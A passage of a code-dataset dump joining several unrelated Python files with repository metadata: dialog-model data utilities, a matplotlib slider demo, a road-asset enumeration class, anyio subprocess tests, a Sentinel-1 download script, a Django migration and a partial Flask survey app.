        else:
            time_list.append('time{}'.format( int(np.ceil((counter+1)*1.0/2)) ) )
            speaker_type_list.append(speaker_type[counter%2])
            counter += 1
    return speaker_type_list, time_list
def get_cand2idx(data, all_utter=False):
    """
    Return a dictionary mapping candidate bot-answer strings to indices.

    Candidates are collected from each story's candidate list (skipping ones
    containing 'unk'), its answer (minus the final token), and its $user /
    $options utterances stripped of their two prefix tokens. Index 0 is
    reserved for 'UNK-SENT'.
    """
    cand_list = []
    for d in data:
        c = [ x['utterance'] for x in d['cand_list'] ]
        a = d['a'][:-1]
        utters = d['utter_list']
        for c_i in c:
            if 'unk' not in c_i:
                cand_list.append(" ".join(c_i))
        cand_list.append(" ".join(a))
        for utter in utters:
            if '$user' in utter or '$options' in utter:
                if all_utter and '$user' in utter:
                    # Mark user utterances with a leading '$' sentinel.
                    cand_list.append("$ "+" ".join(utter[2:]))
                    continue
                else:
                    cand_list.append(" ".join(utter[2:]))
    # Deduplicate before assigning indices.
    cand_list = list(set(cand_list))
    cand_idx = dict((c, i+1) for i, c in enumerate(cand_list))
    cand_idx['UNK-SENT'] = 0
    candidates = []
    for cand in cand_idx.keys():
        candidates.append(tokenize(cand))
    return cand_idx
def is_option(token_sentence):
    """Return True when a tokenized sentence looks like a KB option triple.

    An option line has exactly three tokens and its middle token begins with
    the knowledge-base attribute prefix 'r_' / 'R_' (e.g. 'R_cuisine').
    """
    if len(token_sentence) != 3:
        return False
    prefix = token_sentence[1][:2]
    return 'r_' in prefix or 'R_' in prefix
def get_story_cand_idx(data, cand_idx):
    """Attach a cand_idx index to every candidate of every story.

    Candidates containing 'unk' map to 0; candidates absent from cand_idx are
    matched to the most token-similar known candidate via
    find_similar_candidate().
    """
    cand_per_story = []
    n_cand = len(cand_idx)  # NOTE(review): unused variable.
    for d in data:
        c = d['cand_list']
        temp = []
        for c_i in c:
            if 'unk' not in c_i['utterance']:
                str_utter =" ".join(c_i['utterance'])
                if str_utter not in cand_idx:
                    # Unseen candidate: fall back to the closest known one.
                    max_score_idx = find_similar_candidate(cand_idx, c_i['utterance'])
                    temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': max_score_idx } )
                else:
                    temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': cand_idx[" ".join(c_i['utterance'])] } )
            else:
                temp.append( { 'candidate_id': c_i['candidate_id'], 'utterance': c_i['utterance'] ,'idx': 0 })
        cand_per_story.append(temp)
    return cand_per_story
def find_similar_candidate(cand_idx, ref):
    """Return the index of the candidate most token-similar to *ref*.

    Similarity is the count of positions where the tokenized candidate and
    *ref* share the same word. Returns 0 (UNK) when nothing matches at all.
    """
    scores = []
    for cand, idx in cand_idx.items():
        token_cand = tokenize(cand)
        score = 0
        for pos, word in enumerate(ref):
            if pos < len(token_cand):
                if word == token_cand[pos]:
                    score += 1
        scores.append([ idx, score])
    # Highest positional-overlap score wins.
    scores = sorted(scores, key=lambda tup: tup[1], reverse=True)
    if scores!=[]:
        max_score_idx = scores[0][0] if scores[0][1]!=0 else 0
    else:
        max_score_idx = 0
    return max_score_idx
def build_vocab(data, candidates=[]):
    """Collect the vocabulary over stories (and optionally candidate answers).

    With *candidates*, the vocabulary is the sorted union of all story
    utterance/question tokens plus all candidate tokens. Without, words are
    returned in first-encounter order over each story's utterances, question,
    answer and candidate list.
    """
    if candidates != []:
        vocab = reduce(lambda x, y: x | y,
                       (set(list(chain.from_iterable(d['utter_list'])) + d['q']) for d in data))
        vocab |= reduce(lambda x, y: x | y, (set(candidate) for candidate in candidates))
        return sorted(vocab)
    vocab = []
    for story in data:
        cand_tokens = [cand['utterance'] for cand in story['cand_list']]
        tokens = set(list(chain.from_iterable(story['utter_list']))
                     + story['q'] + story['a']
                     + list(chain.from_iterable(cand_tokens)))
        for token in tokens:
            if token not in vocab:
                vocab.append(token)
    return vocab
def data_information(data, FLAGS, candidates=[], officialtestfile=[]):
    """Flatten a list of dataset shards and compute vocabulary/size statistics.

    Returns:
        (vocab, word_idx, max_story_size, mean_story_size, sentence_size)
        where word_idx maps each word to a 1-based index (0 is implicitly
        reserved for padding). FLAGS/candidates/officialtestfile are accepted
        for signature compatibility but unused.
    """
    flat = []
    for shard in data:
        flat += shard
    vocab = set()
    for story in flat:
        for sentence in story['utterances']:
            vocab = vocab | set(sentence)
    vocab = list(vocab)
    word_idx = {word: pos + 1 for pos, word in enumerate(vocab)}
    story_lengths = [len(story['utterances']) for story in flat]
    max_story_size = max(story_lengths)
    mean_story_size = int(np.mean(story_lengths))
    sentence_size = max(len(sentence) for story in flat
                        for sentence in story['utterances'])
    return vocab, word_idx, max_story_size, mean_story_size, sentence_size
def tokenize(sent):
    #sent=sent.lower()
    #return sent.split(' ')
    '''Lowercase *sent* and return its spaCy tokens, dropping stop tokens.

    Unlike the doctest of an earlier version, punctuation in STOP_WORDS
    (',', '-', '.', '<', '>') and the words "'s", 'a', 'of', 'to' are removed.
    '''
    sent=sent.lower()
    STOP_WORDS=["'s",",","-",".","<",">","a","of","to"]
    result= [token.text for token in nlp(sent) if token.text not in STOP_WORDS]
    # Earlier regex-based tokenizer kept for reference:
    # STOP_WORDS=set(["a","an","the"])
    # sent=sent.lower()
    # if sent=='<silence>':
    #     return [sent]
    # result=[x.strip() for x in re.split('([^A-Za-z_0-9#]+)?', sent) if x.strip() and x.strip() not in STOP_WORDS]
    # if not result:
    #     result=['<silence>']
    # if result[-1]=='.' or result[-1]=='?' or result[-1]=='!':
    #     result=result[:-1]
    return result
def vectorize_data(data, word_idx, sentence_size, batch_size, memory_size, cand_idx,FLAGS):
    """Convert stories and slot goals into padded index tensors.

    Args:
        data: story dicts with 'utterances' (token lists) and 'goal'
            (per-turn dicts with 'area'/'food'/'price range').
        word_idx: word -> index map; unknown words are printed and skipped.
        sentence_size / memory_size: padding targets (0 = pad).
        cand_idx: three dicts (area, food, price range) mapping slot values
            to label indices.
    Returns:
        (S, A, Label): padded stories, per-turn slot label triples padded to
        memory_size, and the final-turn label triple (0 when no goal).
    NOTE(review): batch_size and FLAGS are unused; the inner loop variable
    ``i`` shadows the enumerate index (harmless here since ``i`` is not
    reused afterwards, but fragile).
    """
    S, A ,Label= [], [], []
    for i, d in enumerate(data):
        story, answer = d['utterances'], d['goal']
        ss = []
        for _, sentence in enumerate(story, 1):
            ww = []
            ls = max(0, sentence_size - len(sentence))
            for w in sentence:
                if w in word_idx:
                    ww.append(word_idx[w])
                else:
                    # Out-of-vocabulary word: reported and dropped.
                    print(w)
            ss.append(ww+[0] * ls)
        # Keep only the most recent memory_size sentences.
        ss = ss[::-1][:memory_size][::-1]
        # pad to memory_size
        lm = max(0, memory_size - len(ss))
        for _ in range(lm):
            ss.append([0] * sentence_size)
        y=[]
        for i in range(len(answer)):
            y .append([cand_idx[0][answer[i]['area']],cand_idx[1][answer[i]['food']],cand_idx[2][answer[i]['price range']]])
        for _ in range(max(0, memory_size - len(answer))):
            y.append([0,0,0])
        if len(answer):
            label = [cand_idx[0][answer[-1]['area']],cand_idx[1][answer[-1]['food']],cand_idx[2][answer[-1]['price range']]]
        else:
            label = 0
        S.append(ss)
        A.append(y)
        Label.append(label)
    # if len(answer):
    #     y = [cand_idx[0][answer[-1]['area']],cand_idx[1][answer[-1]['food']],cand_idx[2][answer[-1]['price range']]]
    # else:
    #     y = 0
    #
    # S.append(ss)
    # A.append(y)
    return S, A ,Label
def vectorize_candidates(cand_idx, idx_cand, word_idx, sentence_size):
    """Turn every candidate sentence into a padded list of word indices.

    Candidates containing a '$' sentinel (user utterances) are re-keyed
    without the sentinel in cand_idx and vectorized as all-zeros. Rebuilds
    idx_cand from the (possibly re-keyed) cand_idx.
    NOTE(review): the incoming idx_cand argument is ignored and recomputed.
    """
    C=[]
    # Iterate in index order so C[i] corresponds to candidate index i.
    cand_idx_temp = sorted(cand_idx.items(), key=operator.itemgetter(1))
    counter = 0
    for candidate, idx in cand_idx_temp:
        assert idx == cand_idx[candidate]
        assert idx == counter
        token_candidate = tokenize(candidate)
        user_utter = True if '$' in token_candidate else False
        if user_utter:
            # Strip the sentinel and re-key the candidate under the bare text.
            token_candidate = token_candidate[1:]
            del cand_idx[candidate]
            cand_idx[" ".join(token_candidate)] = idx
        lc=max(0,sentence_size-len(token_candidate))
        if user_utter:
            #print candidate
            C.append([0 for w in token_candidate] + [0] * lc)
        else:
            C.append([word_idx[w] if w in word_idx else 0 for w in token_candidate] + [0] * lc)
        counter += 1
    idx_cand = dict((i, c) for c, i in cand_idx.items()) if cand_idx!=[] else []
    return C, cand_idx, idx_cand
def get_pred_10cands(candsInfo, pred_pro, dialogID=[], rm_unk_sent=False, data=[], idx_cand=[], testInfo=[]):
    """Rank each dialog's candidate answers by predicted probability.

    Args:
        candsInfo: per-dialog candidate dicts with 'candidate_id' and 'idx'.
        pred_pro: per-dialog probability vectors indexed by candidate idx.
        rm_unk_sent: when True, UNK candidates (idx 0) are forced to -100.
        data/idx_cand/testInfo: when all provided, enables a tie-break
            postprocess that prefers the candidate whose extra slot matches
            the KB entity count in testInfo.
    Returns:
        (preds_only_ten, preds_cand_rank): top candidate idx per dialog, and
        full rank lists keyed by candidate_id.
    NOTE(review): mutable default arguments ([]) are shared across calls;
    harmless here only because they are never mutated.
    """
    preds_only_ten = []
    preds_cand_rank = [] # { 'dialog_id': '', 'lst_candidate_id': [ {'candidate_id': '', 'rank': ''}, ...]}
    for i in range(len(pred_pro)):
        cands = [ x['idx'] for x in candsInfo[i]]
        pred_pro_cands = pred_pro[i][cands]
        if rm_unk_sent:
            for idx, cand in enumerate(cands):
                if cand == 0:
                    pred_pro_cands[idx] = -100
        pred_ans_idx = np.argmax(pred_pro_cands)
        preds_only_ten.append(cands[pred_ans_idx])
        lst_candidate_id = []
        dialog_ranking = {'dialog_id': dialogID[i]}
        # Rank candidates by descending probability.
        sort_index = np.argsort( np.array(pred_pro_cands) )
        sort_value = np.sort( np.array(pred_pro_cands) )
        sort_index = sort_index[::-1]
        sort_value = sort_value[::-1]
        for ii in range(len(sort_index)):
            lst_candidate_id.append( {'candidate_id': candsInfo[i][sort_index[ii]]['candidate_id'], 'rank': str(ii+1) } )
        # Postprocess, deal with addition slot, find the most recent entity in dialog information
        if data!=[] and idx_cand!=[] and testInfo!=[]:
            # Only triggered on an exact tie between the top two scores.
            if sort_value[0] == sort_value[1]:
                c = data[i]['cand_list']
                highest_template = idx_cand[ cands[sort_index[0]] ]
                for c_i in c:
                    # Derive a KB key (e.g. 'R_phone') from the text that the
                    # candidate adds on top of the template.
                    strdiff = ' '.join(c_i['utterance']).replace(highest_template,"").replace(" ","")
                    possKey = 'R_'+strdiff[3:-3]
                    if highest_template in ' '.join(c_i['utterance']) and \
                       possKey in testInfo[i].keys() and \
                       str(len(testInfo[i][possKey])) in c_i['utterance'][-1]:
                        highest_cand_id = c_i['candidate_id']
                        # Swap ranks so the KB-consistent candidate is rank 1.
                        for lst_id in lst_candidate_id:
                            if lst_id['candidate_id']==highest_cand_id:
                                temp = lst_id['rank']
                                lst_id['rank'] = '1'
                                break
                        for lst_id2 in lst_candidate_id:
                            if lst_id2['rank']=='1' and lst_id2['candidate_id']!=highest_cand_id:
                                lst_id2['rank']=temp
                                break
                        #print 'Choose:', c_i['utterance']
                        break
        dialog_ranking['lst_candidate_id'] = lst_candidate_id
        preds_cand_rank.append(dialog_ranking)
    return preds_only_ten, preds_cand_rank
def get_type_dict(kb_path):
    """Parse a knowledge-base file into {entity_type: [values]}.

    Each KB line has the form ``<idx> <restaurant> <entity>\\t<value>``.
    Restaurant names are additionally collected under 'R_restaurant', and
    duplicate values per entity are skipped.

    Bug fixed: the file was opened in binary mode ('rb') and then split with
    str separators, which raises TypeError on Python 3; it is now opened in
    text mode with a context manager so the handle is always closed.
    """
    type_dict = {'R_restaurant': []}
    with open(kb_path, 'r') as fd:
        for line in fd:
            x = line.split('\t')[0].split(' ')
            rest_name = x[1]
            entity = x[2]
            entity_value = line.split('\t')[1].replace('\n', '')
            if rest_name not in type_dict['R_restaurant']:
                type_dict['R_restaurant'].append(rest_name)
            if entity not in type_dict:
                type_dict[entity] = []
            if entity_value not in type_dict[entity]:
                type_dict[entity].append(entity_value)
    return type_dict
def combine_SQ(SQ):
    """Merge each (story_sentences, question) pair into joined strings.

    Each element of SQ is ``[list_of_token_lists, token_list]``; the question
    is appended to the story sentences and every sentence is rendered as one
    space-joined string. Returns a numpy array of the per-dialog lists.
    """
    combined = []
    for pair in SQ:
        sentences = pair[0] + [pair[1]]
        combined.append([' '.join(tokens) for tokens in sentences])
    return np.array(combined)
def shuffle_array(shuffle_array_list, shuffle_idx):
    """Reorder every array in *shuffle_array_list* by *shuffle_idx*, in place.

    Bug fixed: the original rebound the loop variable
    (``shuffle_array = shuffle_array[shuffle_idx]``), which only changed a
    local name and had no effect on the caller's list. The list is now
    updated by index so callers observe the shuffled arrays.
    """
    for pos, arr in enumerate(shuffle_array_list):
        # Fancy indexing returns a reordered copy; store it back in the list.
        shuffle_array_list[pos] = arr[shuffle_idx]
def batch_evaluate(model, S, A, n_data, eval_batch):
    """Run model.predict over S in batches and accumulate predictions/loss.

    Returns:
        (preds, 0, mean_loss, preds_cui, preds_loc, preds_pri) — stacked
        per-slot predictions plus the loss averaged over n_data/eval_batch.
    NOTE(review): ``end = start + eval_batch`` overrides the shorter final
    batch computed above — confirm S is always a multiple of eval_batch or
    that the slice over-run is intended. In the A==[] branch pred_cui /
    pred_loc / pred_pri are never assigned, so the concatenations below would
    raise — presumably that branch is unused; verify.
    """
    preds = np.empty((0,3),dtype=int)
    preds_cui = np.empty((0,1),dtype=int)
    preds_loc = np.empty((0,1),dtype=int)
    preds_pri = np.empty((0,1),dtype=int)
    preds_prob = []
    losses = 0.0
    total_batch = int(len(S) / eval_batch)
    # jj adds one extra (short) batch when len(S) is not divisible by eval_batch.
    jj=int(len(S)!=total_batch*eval_batch)
    batches=[(eval_batch * i,eval_batch * (i + 1)) if eval_batch * (i + 1) <= len(S) else (eval_batch * i,len(S)) for i in range(total_batch+jj)]
    prog_bar = tqdm(batches)
    for start, end in prog_bar:
        end = start + eval_batch
        s = S[start:end]
        if A!=[]:
            a = A[start:end]
            pred, loss,pred_cui,pred_loc,pred_pri = model.predict(s, a)
            losses += loss
        else:
            pred = model.predict(s)
            # preds_prob += list(model.predict_proba(s))
        preds =np.concatenate((preds,pred),0)
        preds_cui =np.concatenate((preds_cui,pred_cui[:,None]),0)
        preds_loc =np.concatenate((preds_loc,pred_loc[:,None]),0)
        preds_pri =np.concatenate((preds_pri,pred_pri[:,None]),0)
    return preds, 0, losses/(n_data/eval_batch),preds_cui,preds_loc,preds_pri
| [
"yangyang950418@outlook.com"
] | yangyang950418@outlook.com |
00796d3b3a4472968a31b50cfda2cb973bf04186 | 2b08e2af586db3b290773bf579ba243962b5e7d5 | /interactivo.py | d1758cd6945e8311071ff7ed59a2a6a6013fd7a5 | [] | no_license | schiob/python-ciencias-basicas | e7fa4332e3038993c81388272280c4da90812959 | 433a210f1a80ecdbd6a70df468d9e579ff26df7e | refs/heads/main | 2023-06-05T05:10:15.130329 | 2021-06-24T00:20:55 | 2021-06-24T00:20:55 | 378,769,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
# The parametrized function to be plotted
def f(t, amplitude, frequency):
return amplitude * np.sin(2 * np.pi * frequency * t)
t = np.linspace(0, 1, 1000)
# Define initial parameters
init_amplitude = 5
init_frequency = 3
# Create the figure and the line that we will manipulate
fig, ax = plt.subplots()
line, = plt.plot(t, f(t, init_amplitude, init_frequency), lw=2)
ax.set_xlabel('Time [s]')
axcolor = 'lightgoldenrodyellow'
ax.margins(x=0)
# adjust the main plot to make room for the sliders
plt.subplots_adjust(left=0.25, bottom=0.25)
# Make a horizontal slider to control the frequency.
axfreq = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)
freq_slider = Slider(
ax=axfreq,
label='Frequency [Hz]',
valmin=0.1,
valmax=30,
valinit=init_frequency,
)
# Make a vertically oriented slider to control the amplitude
axamp = plt.axes([0.1, 0.25, 0.0225, 0.63], facecolor=axcolor)
amp_slider = Slider(
ax=axamp,
label="Amplitude",
valmin=0,
valmax=10,
valinit=init_amplitude,
orientation="vertical"
)
# The function to be called anytime a slider's value changes
def update(val):
line.set_ydata(f(t, amp_slider.val, freq_slider.val))
fig.canvas.draw_idle()
# register the update function with each slider
freq_slider.on_changed(update)
amp_slider.on_changed(update)
# Create a `matplotlib.widgets.Button` to reset the sliders to initial values.
resetax = plt.axes([0.8, 0.025, 0.1, 0.04])
button = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')
def reset(event):
freq_slider.reset()
amp_slider.reset()
button.on_clicked(reset)
plt.show() | [
"schiob4@gmail.com"
] | schiob4@gmail.com |
e4a39f7dc670a9334da406a630aee065d7152554 | 0e478f3d8b6c323c093455428c9094c45de13bac | /src/OTLMOW/OTLModel/Datatypes/KlAlgSnelheidsregime.py | 421b590ae8912821efe765805334d2de3ff76636 | [
"MIT"
] | permissive | davidvlaminck/OTLMOW | c6eae90b2cab8a741271002cde454427ca8b75ba | 48f8c357c475da1d2a1bc7820556843d4b37838d | refs/heads/main | 2023-01-12T05:08:40.442734 | 2023-01-10T15:26:39 | 2023-01-10T15:26:39 | 432,681,113 | 3 | 1 | MIT | 2022-06-20T20:36:00 | 2021-11-28T10:28:24 | Python | UTF-8 | Python | false | false | 3,552 | py | # coding=utf-8
import random
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlAlgSnelheidsregime(KeuzelijstField):
    """De snelheidsregimes met variabele mogelijkeid."""
    naam = 'KlAlgSnelheidsregime'
    label = 'Snelheidsregime'
    objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlAlgSnelheidsregime'
    definition = 'De snelheidsregimes met variabele mogelijkeid.'
    status = 'ingebruik'
    codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlAlgSnelheidsregime'
    options = {
        '120': KeuzelijstWaarde(invulwaarde='120',
                                label='120',
                                status='ingebruik',
                                definitie='120 km/h.',
                                objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/120'),
        '30': KeuzelijstWaarde(invulwaarde='30',
                               label='30',
                               status='ingebruik',
                               definitie='30 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/30'),
        '50': KeuzelijstWaarde(invulwaarde='50',
                               label='50',
                               status='ingebruik',
                               definitie='50 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/50'),
        '60': KeuzelijstWaarde(invulwaarde='60',
                               label='60',
                               status='ingebruik',
                               definitie='60 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/60'),
        '70': KeuzelijstWaarde(invulwaarde='70',
                               label='70',
                               status='ingebruik',
                               definitie='70 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/70'),
        '80': KeuzelijstWaarde(invulwaarde='80',
                               label='80',
                               status='ingebruik',
                               definitie='80 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/80'),
        '90': KeuzelijstWaarde(invulwaarde='90',
                               label='90',
                               status='ingebruik',
                               definitie='90 km/h.',
                               objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/90'),
        'variabel': KeuzelijstWaarde(invulwaarde='variabel',
                                     label='variabel',
                                     status='ingebruik',
                                     definitie='Variabele ingave.',
                                     objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/variabel')
    }

    @classmethod
    def create_dummy_data(cls):
        """Return the invulwaarde of a random option whose status is 'ingebruik'."""
        # Comprehension replaces the original map/filter/lambda chain — same
        # candidate set, clearer intent.
        in_use = [option.invulwaarde for option in cls.options.values()
                  if option.status == 'ingebruik']
        return random.choice(in_use)
| [
"david.vlaminck@mow.vlaanderen.be"
] | david.vlaminck@mow.vlaanderen.be |
e7f9f3b65ee5f136748617b0468a728d10b56ab2 | 13b269bc05f0a0bb83887ca0b5250fa7fbdda085 | /tests/test_to_process.py | 1e337ef62c5c2c5708bd0c000e03bfc926d099f2 | [
"MIT"
] | permissive | flyte/anyio | e31866be5307e1c66ebcc6df17ebe2d786f32e0d | 9eb4671547b01f5e3ba0e0ca602b6aceec15af86 | refs/heads/master | 2023-04-25T16:00:09.711501 | 2021-05-22T12:51:25 | 2021-05-22T12:51:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | import os
import platform
import sys
import time
from functools import partial
import pytest
from anyio import CancelScope, create_task_group, fail_after, to_process, wait_all_tasks_blocked
pytestmark = pytest.mark.anyio
@pytest.fixture(autouse=True)
def check_compatibility(anyio_backend_name):
if anyio_backend_name == 'asyncio':
if platform.system() == 'Windows' and sys.version_info < (3, 8):
pytest.skip('Python < 3.8 uses SelectorEventLoop by default and it does not support '
'subprocesses')
async def test_run_sync_in_process_pool():
"""
Test that the function runs in a different process, and the same process in both calls.
"""
worker_pid = await to_process.run_sync(os.getpid)
assert worker_pid != os.getpid()
assert await to_process.run_sync(os.getpid) == worker_pid
async def test_identical_sys_path():
"""Test that partial() can be used to pass keyword arguments."""
assert await to_process.run_sync(eval, 'sys.path') == sys.path
async def test_partial():
"""Test that partial() can be used to pass keyword arguments."""
assert await to_process.run_sync(partial(sorted, reverse=True), ['a', 'b']) == ['b', 'a']
async def test_exception():
"""Test that exceptions are delivered properly."""
with pytest.raises(ValueError, match='invalid literal for int'):
assert await to_process.run_sync(int, 'a')
async def test_print():
"""Test that print() won't interfere with parent-worker communication."""
worker_pid = await to_process.run_sync(os.getpid)
await to_process.run_sync(print, 'hello')
await to_process.run_sync(print, 'world')
assert await to_process.run_sync(os.getpid) == worker_pid
async def test_cancel_before():
"""
Test that starting to_process.run_sync() in a cancelled scope does not cause a worker
process to be reserved.
"""
with CancelScope() as scope:
scope.cancel()
await to_process.run_sync(os.getpid)
pytest.raises(LookupError, to_process._process_pool_workers.get)
async def test_cancel_during():
"""
Test that cancelling an operation on the worker process causes the process to be killed.
"""
worker_pid = await to_process.run_sync(os.getpid)
with fail_after(4):
async with create_task_group() as tg:
tg.start_soon(partial(to_process.run_sync, cancellable=True), time.sleep, 5)
await wait_all_tasks_blocked()
tg.cancel_scope.cancel()
# The previous worker was killed so we should get a new one now
assert await to_process.run_sync(os.getpid) != worker_pid
| [
"noreply@github.com"
] | flyte.noreply@github.com |
7efa51e2c82d4381c2b16b6c2d5ae76530f80b70 | 3d47bd1876d67401985614a31e04909ec66a203e | /home/migrations/0001_initial.py | 290ef01a18b3dad7ac2d96076b23163858f671ce | [] | no_license | ermi13/setuporignal | 3abcea610941d0137fde9fa82b9b068defb05e33 | 5e12f75dc9725aa13461d6d413476783be6eeddf | refs/heads/master | 2023-01-29T04:18:27.818686 | 2020-12-07T21:34:46 | 2020-12-07T21:34:46 | 317,366,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | # Generated by Django 3.1.3 on 2020-11-30 22:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial schema: creates the Service and Plan tables.
    # Avoid hand-editing generated migrations; create a follow-up migration
    # for schema changes instead.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Service',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order', models.IntegerField(default=0)),
                ('name', models.CharField(max_length=100)),
                ('descriptions', models.TextField()),
                ('newFeatures', models.TextField(null=True)),
                ('serviceImageUrl', models.FileField(upload_to='')),
            ],
        ),
        migrations.CreateModel(
            name='Plan',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Planame', models.CharField(max_length=100)),
                ('Plandescription', models.TextField()),
                ('previous_price', models.IntegerField(null=True)),
                ('current_price', models.IntegerField()),
                # Plan -> Service link; SET_NULL keeps plans when a service is deleted.
                ('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='home.service')),
            ],
        ),
    ]
| [
"ermibling13@gmail.com"
] | ermibling13@gmail.com |
ac4efd009836bdbfc78a0f6aeed1d75784d572f2 | b7c0397e394c81357bcc0e388d03b29a09a6a5a8 | /bin/sentinel1_tile_download.py | 8041f83cd054faf3dc089f2544a75e885ea7eaff | [] | no_license | danhirst98/sentinel2-dataset-pipeline | 89c8d3f18eb495577fd6f5d522f0a2a8a202f071 | 0b88299ac7aba05bf78442af581a602849f9033f | refs/heads/master | 2023-01-12T07:30:30.577607 | 2020-01-19T20:18:10 | 2020-01-19T20:18:10 | 202,750,341 | 1 | 0 | null | 2022-12-26T20:48:00 | 2019-08-16T15:14:20 | Python | UTF-8 | Python | false | false | 775 | py | from sentinelsat.sentinel import SentinelAPI, read_geojson, geojson_to_wkt
from datetime import datetime, timedelta
def sentinel1_tile_download(file, username, password, tilepath):
    """Query Copernicus Open Access Hub for Sentinel-1 SLC products over an
    area of interest and download them.

    Args:
        file: path to a GeoJSON file describing the footprint.
        username/password: SciHub credentials.
        tilepath: directory where downloaded products are stored.

    Fixes over the original:
      - ``download_all`` keyword is ``directory_path`` (the original
        ``directorypath`` raised TypeError).
      - The 60-day date window was computed but unused while the commented-out
        query applied it; the active query now filters on it as intended.
    """
    api = SentinelAPI(username, password, 'https://scihub.copernicus.eu/dhus')
    # Search window: the last 60 days.
    td = timedelta(days=60)
    endDate = datetime.now()
    startDate = endDate - td
    footprint = geojson_to_wkt(read_geojson(file))
    print(footprint)
    products = api.query(footprint,
                         date=(startDate, endDate),
                         producttype='SLC',
                         orbitdirection='ASCENDING')
    # download all results from the search
    api.download_all(products, directory_path=tilepath)
    return
"danielhirst1998@gmail.com"
] | danielhirst1998@gmail.com |
255f4e48e12b0086a363b02a7d0c3e7cf026e4cf | 191a7f83d964f74a2b3c7faeb4fc47d9c63d521f | /.history/main_20210529123243.py | 4b781a03c1f4d2efb3abc216954d34d660e80018 | [] | no_license | AndreLiu1225/Kinder-Values-Survey | 2a317feee8d5b17c27da2b2116742656e35d8ab9 | 090c27da0c822abb7dfc0ec6e13ae1b3dcb7bbf3 | refs/heads/master | 2023-05-03T00:26:00.481423 | 2021-06-04T03:24:19 | 2021-06-04T03:24:19 | 371,989,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,684 | py | from flask import Flask, render_template, redirect, url_for, flash, request
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, TextField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired, Email, EqualTo, Length, ValidationError
import datetime
import matplotlib.pyplot as plt
app = Flask(__name__)
# NOTE(review): hard-coding SECRET_KEY in source control is a security risk;
# load it from an environment variable in production.
app.config['SECRET_KEY'] = "0c8973c8a5e001bb0c816a7b56c84f3a"
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///site.db"
db = SQLAlchemy(app)
class Survey(db.Model):
    # One row per survey response: respondent info plus ten Schwartz-value
    # scores (each an integer rating).
    id = db.Column(db.Integer, primary_key=True)
    age = db.Column(db.Integer, nullable=False)
    email = db.Column(db.String(50), nullable=False)
    profession = db.Column(db.String(50), nullable=False)
    power = db.Column(db.Integer, nullable=False)
    tradition = db.Column(db.Integer, nullable=False)
    achievement = db.Column(db.Integer, nullable=False)
    stimulation = db.Column(db.Integer, nullable=False)
    hedonism = db.Column(db.Integer, nullable=False)
    conformity = db.Column(db.Integer, nullable=False)
    security = db.Column(db.Integer, nullable=False)
    self_direction = db.Column(db.Integer, nullable=False)
    benevolence = db.Column(db.Integer, nullable=False)
    universalism = db.Column(db.Integer, nullable=False)
    date_posted = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)

    def __repr__(self):
        # Bug fix: the model has no 'name' column, so the original
        # f"...{self.name}..." raised AttributeError whenever a Survey was
        # repr()'d; use the email column instead.
        return f"Survey('{self.age}', '{self.email}', '{self.date_posted}')"
class MCQ(FlaskForm):
    """Survey form: respondent info plus ten Likert-style (1-4) value items.

    Items are grouped by Schwartz higher-order value (see section comments).
    NOTE(review): the 1-4 range is stated only in the question text; it is not
    enforced by a validator — consider NumberRange if strictness is needed.
    """
    email = StringField("What is your email?", validators=[DataRequired(), Email(message=('Not a valid email address')), Length(max=50)])
    age = IntegerField("Please enter your age", validators=[DataRequired()])
    profession = StringField("What is your profession?", validators=[DataRequired(), Length(max=30)])
    # Self-Enhancement
    power = IntegerField("Do you desire a higher social status and dominance over others? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    hedonism = IntegerField("Is personal gratification the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    achievement = IntegerField("Is achievement according to social standards important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    # Conservation
    tradition = IntegerField("Do you care about preserving traditions? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
